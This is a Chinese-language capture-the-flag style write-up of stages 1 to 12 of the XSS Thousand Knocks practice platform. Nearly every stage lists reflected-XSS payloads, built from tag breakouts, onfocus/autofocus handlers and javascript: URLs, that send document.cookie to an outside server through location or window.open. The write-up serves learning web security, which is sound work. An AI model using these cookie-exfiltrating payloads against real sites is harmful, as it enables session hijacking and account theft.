在学完 Sqli-Labs 之后一直想学 XSS，总是因各种事情耽搁，还因为自己太懒了。
然后每打一次比赛都能深刻感受到自己的菜，每次都告诫自己不能再这样下去了。
搭了自己的 VPS 和博客之后觉得 WordPress 也么有想象中的那么好用，有学习笔记啥的还是放在简书上，也许以后那边会放些 WP。

XSS Thousand Knocks 是一个练习 XSS 的平台，看到夏语的博客里说这个比先知挑战赛的质量差很多，先拿来作为入门练习吧。
做这些题你需要一个有公网 IP 的 VPS，你成功做出题后服务器会把 flag 打到你的服务器上，通过查看 VPS 的日志获取 flag。
我的 VPS 是用宝塔 Linux 面板一键安装的Nginx，它的日志路径是/www/wwwlogs/domain.log，使用tail -f domain.log -n 20实时查看日志的最后 20 行。
XSS 的笔记会比 Sqli 的少很多，所以大概一篇就够了。

0x01. Stage 01：开篇引导

这是一个引导关，在给你的每一个关卡链接中找到 XSS 漏洞，再将 payload 的相应部分换成location=%22http://domain/?%22%2Bdocument.cookie填入下方的URL form，然后在 VPS 的日志里找到 flag。

?alert(1)
?location=%22http://domain/?%22%2Bdocument.cookie

0x02. Stage 02 - 06：尖括号闭合

Stage 02

?q=XSS

XSS

?q=<script>alert(1)</script>
?q=<script>location=%22http://domain/?%22%2Bdocument.cookie</script>

Stage 03

?q=XSS

<a href="/q=XSS">Link</a>

?q="/><script>alert(1)</script><a>
?q="/><script>location=%22http://domain/?%22%2Bdocument.cookie</script><a>

Stage 04

?q=XSS

<a href='/q=XSS'>Link</a>

?q='/><script>alert(1)</script><a>
?q='/><script>location=%22http://domain/?%22%2Bdocument.cookie</script><a>

Stage 05

?q=XSS

<textarea>XSS<textarea>

?q=</textarea><script>alert(1)</script><textarea>
?q=</textarea><script>location=%22http://domain/?%22%2Bdocument.cookie</script><textarea>

Stage 06

?q=XSS

<xmp>XSS</xmp>

?q=</xmp><script>alert(1)</script><xmp>
?q=</xmp><script>location=%22http://domain/?%22%2Bdocument.cookie</script><xmp>

0x03. Stage 07 - 09：<input>标签

Stage 07：转义尖括号

?q=XSS

<input type="text" value="XSS">

发现尖括号被转义了：

?q="><script>alert(1)</script>

<input type="text" value=""&gt;%lt;script&gt;alert(1)&lt;/script&gt;">

使用<input>标签的autofocus和onfucus属性，autofocus规定在页面加载时，域自动地获得焦点。

?q="+onfocus="alert(1)"+autofocus="
?q="+onfocus="location='http://hyafinthus.tk/?'%2Bdocument.cookie"+autofocus="

Stage 08：转义双引号

?q=XSS

<input type='text' value='XSS'>

发现尖括号还是被转义：

?q='><script>alert(1)</script>

<input type='text' value=''&gt;&lt;script&gt;alert(1)&lt;/script&gt;'>

尝试 Stage 07 中的onfocus发现双引号也被转义：

?q='+onfocus="location='http://domain/?'%2Bdocument.cookie"+autofocus='

<input type='text' value='' onfocus=&quot;location='http://domain/?'+document.cookie&quot; autofocus=''>

尝试将onfocus的引号去掉：

?q='+onfocus=location='http://domain/?'%2Bdocument.cookie+autofocus='

Stage 09

?q=XSS

<input type=text value=XSS>

这里发现虽然单双引号被转义但是还是能够跳转的，Stage 07 和 08 同：

?q=''+onfocus=location='http://domain/?'%2Bdocument.cookie+autofocus='

<input type=text value=&#039;&#039; onfocus=location=&#039;http://domain/?&#039;+document.cookie autofocus>

0x04. Stage 10 - 12：js伪协议

Stage 10

?q=XSS

<frameset><frame src="[XSS]"></frameset>

发现尖括号和双引号被转义：

?q="/><script>alert(1)</script>

<frameset><frame src="[&quot;/&gt;&lt;script&gt;alert(1)&lt;/script&gt;]"></frameset>

查到这里应该用伪协议：

真协议用来在计算机之间传输数据包，如 http 协议，ftp 协议；伪协议是一种非标准化的协议，让使用者可以通过链接来调用 js 函数。

?q=javascript:alert(1)
?q=javascript:location='http://domain/?'%2Bdocument.cookie

Stage11

?q=XSS

<iframe src="[XSS]"></iframe>

?q=javascript:alert(1)
?q=javascript:location='http://domain/?'%2Bdocument.cookie

Stage 12

?q=XSS

<iframe src="[XSS]"></iframe>

但是被拦截了：

?q=javascript:location='http://domain/?'%2Bdocument.cookie

对服务器的请求已遭到某个扩展程序的阻止。

尝试将location=换成window.open()：

?q=javascript:window.open('http://domain/?'%2Bdocument.cookie)

如果单引号'被过滤也可以换成反引号`。这里还有另一种 payload：https://lugrria.gitbook.io/writeup/xss-thousand-knocks/stage12